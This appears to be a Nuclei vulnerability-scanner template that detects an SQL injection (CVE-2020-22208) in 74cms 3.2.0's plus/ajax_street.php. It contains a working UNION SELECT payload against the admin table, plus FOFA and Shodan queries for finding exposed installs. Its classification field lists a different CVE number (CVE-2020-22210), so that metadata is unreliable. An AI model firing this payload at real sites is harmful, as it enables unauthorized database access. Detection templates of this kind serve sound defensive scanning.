35 lines
948 B
YAML
35 lines
948 B
YAML
id: CVE-2020-22208
|
||
|
||
info:
|
||
name: 74cms - ajax_street.php 'x' SQL Injection
|
||
author: ritikchaddha
|
||
severity: critical
|
||
description: |
|
||
SQL Injection in 74cms 3.2.0 via the x parameter to plus/ajax_street.php.
|
||
reference:
|
||
- https://github.com/blindkey/cve_like/issues/10
|
||
- https://nvd.nist.gov/vuln/detail/CVE-2020-22208
|
||
classification:
|
||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||
cvss-score: 9.8
|
||
cve-id: CVE-2020-22210
|
||
cwe-id: CWE-89
|
||
metadata:
|
||
verified: true
|
||
fofa-query: app="74cms"
|
||
shodan-query: http.html:"Powered by 74cms"
|
||
tags: cve,cve2020,74cms,sqli
|
||
|
||
requests:
|
||
- method: GET
|
||
path:
|
||
- "{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11<31>'%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{randstr}}),9%20from%20qs_admin#"
|
||
|
||
matchers:
|
||
- type: word
|
||
part: body
|
||
words:
|
||
- '{{md5("{{randstr}}")}}'
|
||
|
||
# Enhanced by cs on 2022/06/21
|